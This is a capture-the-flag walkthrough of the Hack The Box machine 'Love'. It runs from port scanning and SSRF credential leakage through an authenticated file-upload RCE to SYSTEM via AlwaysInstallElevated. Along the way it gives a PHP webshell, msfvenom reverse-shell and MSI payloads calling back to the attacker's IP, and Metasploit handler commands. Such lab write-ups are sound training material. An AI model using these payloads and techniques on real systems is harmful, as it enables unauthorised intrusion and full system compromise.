┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.239
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| LPDString, TerminalServer, WMSRequest, giop:
|_ Host '10.10.16.4' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=1/19%Time=65AB207E%P=x86_64-pc-linux-gnu%r
SF:(LPDString,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Termi
SF:nalServer,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(WMSReq
SF:uest,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,49,"E\
SF:0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server");
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|Longhorn|2008|7|2019|11|Vista|XP|8.1 (95%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (95%), Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8 (93%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 2004 (93%), Microsoft Windows 10 2004 (93%), Microsoft Windows Server 2019 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h01m34s, deviation: 4h37m10s, median: 21m32s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-19T17:45:25-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-20T01:45:22
|_ start_date: N/A
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.239
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5050/udp open|filtered mmcc
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1138.51 seconds
Both by IP and love.htb, the page returns a login form for a voting system The page title is “Voting System using PHP”. Some basic password guessing didn’t lead anywhere. No matter what I entered, it returned:
Basic SQL injections didn’t lead anywhere either.
Voting System: http://10.10.10.239/
VIEW SOURCE:
view-source:http://10.10.10.239/
SSL CERT:
WHATWEB:
┌──(kali💀kali)-[~]
└─$ whatweb -a3 https://10.10.10.239/ -v
WhatWeb report for https://10.10.10.239/
Status : 403 Forbidden
Title : 403 Forbidden
IP : 10.10.10.239
Country : RESERVED, ZZ
Summary : Apache[2.4.46], HTTPServer[Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27], OpenSSL[1.1.1j], PHP[7.3.27]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.46 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 (from server string)
[ OpenSSL ]
The OpenSSL Project is a collaborative effort to develop a
robust, commercial-grade, full-featured, and Open Source
toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as
a full-strength general purpose cryptography library.
Version : 1.1.1j
Website : http://www.openssl.org/
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 7.3.27
Google Dorks: (2)
Website : http://www.php.net/
HTTP Headers:
HTTP/1.1 403 Forbidden
Date: Sat, 20 Jan 2024 02:33:46 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1
It returned a bunch of 403 forbiddens, and 301/302 redirects. I am most interested in /admin. Visiting presents another login form:
NIKTO:
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.239
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: Retrieved x-powered-by header: PHP/7.3.27.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/1.1.1j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/7.3.27 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /admin/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /Admin/: This might be interesting.
I’ll run with -r login.request to give it the file to work from, --force-ssl (as that’s where the site is), and --batch to accept the defaults at the prompts. It finds four injections:
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch
[21:34:18] [WARNING] POST parameter 'login' does not seem to be injectable
[21:34:18] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:34:18] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 219 times
I’ll add --dbs to the end of the command and run it again to list the dbs:
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --dbs
[21:39:08] [WARNING] POST parameter 'login' does not seem to be injectable
[21:39:08] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:39:08] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 218 times
I will list the tables in public, finding one:
sqlmap -r request --force-ssl --batch -D public --tables
I will dump a single user, admin, and their password hash. sqlmap tries to crack it but fails, and Google doesn’t know it either.
sqlmap -r request --force-ssl --batch -D public -T users --dump
The previous command identified the OS as Debian 10. Given this is a Windows host according to HTB, this must be in a Docker container. The id command returns as well:
SSRF
Getting the server to make a request and potentially access something I can’t access otherwise is known as a server-side request forgery (SSRF) exploit. While typically they are a bit more well disguised than a site that asks for for the url, using this to access things I shouldn’t have access to is SSRF all the same.
I tried entering https://127.0.0.1, but nothing returned. However, when I checked the service on 5000 by entering http://127.0.0.1:5000:
Vote Admin Creds admin: @LoveIsInTheAir!!!!
It seems to be giving creds for the Voting System, and they work.
RCE via Searchsploit Script
Having identified an authenticated RCE exploit in Voting System earlier in searchsploit, and now creds, ‘ll give that a try. searchsploit -m php/webapps/49445.py will copy it to my current working directory. It’s a Python script. At the top there’s some config info to update:
┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m php/webapps/49445.py
Exploit: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
URL: https://www.exploit-db.com/exploits/49445
Path: /usr/share/exploitdb/exploits/php/webapps/49445.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable, with very long lines (6002)
Copied to: /home/kali/Desktop/49445.py
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.16.4" # Reverse shell IP
REV_PORT = "8888" # Reverse port
# --------------------------------
Troubleshooting:
I ran the exploit, and nothing happened Looking at the Python script, it is using requests to send HTTP requests to the website. At the start, it creates a session, which will hold things like cookies to enable things like logging in. It stores it in the global variable s. I’ll add Burp as a proxy to that session so that I can see the requests it is sending and potentially see what’s wrong.
On running the script again, I see three requests, all of which are returning 404: It’s not finding any of those pages. Above, I found the admin login page at /admin/login.php, but for some reason this script is adding /votingsystem before that. Right under where I configured the settings, there’s a handful of URLs defined: I’ll remove /votingsystem from each and save the script.
RCE Manually
Once logged in, there’s not a ton to see: Clicking around the panels didn’t lead to anything interesting. However, clicking on the logged in user’s name, Neovic Devierte, there’s an option to update: Clicking that brings up a form to update the admin profile:
The profile picture is the first target that comes to mind, as it’s the chance to upload something. It looks like zero filtering is in place, as if I just select a simple PHP webshell and upload it as cmd.php, it doesn’t complain.
<?php system($_REQUEST["cmd"]); ?>
The image is now broken at the top: Looking at the source for the page, it saved the file as cmd.php: Visiting http://love.htb/images/cmd.php returns an error about missing cmd: Notice: Undefined index: cmd in C:\xampp\htdocs\omrs\images\shell.php on line 1 Warning: system(): Cannot execute a blank command in C:\xampp\htdocs\omrs\images\shell.php on line 1
Adding ?cmd=whoami to the end shows I have execution:
┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=2560 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
I activated exploit/multi/handler
┌──(kali💀kali)-[~]
└─$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.4:4444
[*] Sending stage (175686 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.239:52801) at 2024-01-20 08:02:10 -0500
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 552 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
love\phoebe
C:\xampp\htdocs\omrs\images>cd C:\Users\Phoebe\Desktop
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
11fe5539e57b18f---------------------
Shell as SYSTEM
Enumeration
After looking around the filesystem a bit manually, I opted to run WinPEAS. After cloning the repo to my VM, I went into the directory with winPEAS.exe and started a Python web server (python3 -m http.server 80).
There’s a hit on the webserver, and the file is present. Now I’ll run it with .\wp.exe. There’s a ton of output, so I’ll just highlight the interesting parts.
C:\ProgramData>dir
Directory of C:\ProgramData
07/10/2015 03:04 AM <DIR> Comms
11/18/2020 11:45 PM <DIR> Microsoft OneDrive
04/21/2021 06:58 AM <DIR> Package Cache
04/13/2021 07:40 AM <DIR> Packages
01/19/2024 05:42 PM <DIR> regid.1991-06.com.microsoft
12/07/2019 01:14 AM <DIR> SoftwareDistribution
11/18/2020 06:54 PM <DIR> ssh
04/12/2021 12:14 PM <DIR> USOPrivate
12/07/2019 01:14 AM <DIR> USOShared
04/21/2021 09:02 AM <DIR> VMware
12/07/2019 01:52 AM <DIR> WindowsHolographicDevices
01/20/2024 06:46 AM 2,234,880 wp.exe
Being able to create directories at the C:\ root is interesting.
[+] Drives Information
[?] Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 3 GB)(Permissions: Authenticated Users [AppendData/CreateDirectories])
Display information about local users
Computer Name : LOVE
User Name : Administrator
User Id : 500
Is Enabled : True
User Type : Administrator
Comment : Built-in account for administering the computer/domain
Last Logon : 1/20/2024 6:47:33 AM
Logons Count : 737
Password Last Set : 4/12/2021 12:24:41 PM
=================================================================================================
Computer Name : LOVE
User Name : DefaultAccount
User Id : 503
Is Enabled : False
User Type : Guest
Comment : A user account managed by the system.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM
=================================================================================================
Computer Name : LOVE
User Name : Guest
User Id : 501
Is Enabled : False
User Type : Guest
Comment : Built-in account for guest access to the computer/domain
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM
=================================================================================================
Computer Name : LOVE
User Name : Phoebe
User Id : 1002
Is Enabled : True
User Type : User
Comment : Workstation Power User
Last Logon : 1/19/2024 5:42:44 PM
Logons Count : 23
Password Last Set : 4/12/2021 11:54:30 AM
=================================================================================================
Computer Name : LOVE
User Name : WDAGUtilityAccount
User Id : 504
Is Enabled : False
User Type : Guest
Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 4/12/2021 12:10:32 PM
AlwaysInstallElevated:
These registry keys tell windows that a user of any privilege can install .msi files are NT AUTHORITY\SYSTEM. So all I need to do is create a malicious .msi file, and run it.
I’ll use msfvenon to create the MSI installer. I did show this process manually for Ethereal, but it’s a painful process, and msfvenom will work here. I’ll use a reverse shell payload that I can catch with nc:
┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=443 -f msi -o rev.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: rev.msi
This requests the file from my Python webserver (now running out of my love directory) and fetches the MSI.
C:\ProgramData>.\rev.msi
This returns nothing, but there’s a shell at my listening nc:
┌──(kali💀kali)-[~]
└─$ rlwrap nc -lnvp 443
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.239] 52812
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\system
C:\WINDOWS\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Directory of C:\Users\Administrator\Desktop
04/13/2021 02:20 AM <DIR> .
04/13/2021 02:20 AM <DIR> ..
01/19/2024 05:43 PM 34 root.txt
C:\Users\Administrator\Desktop> type root.txt
6369eb24d114e591---------------------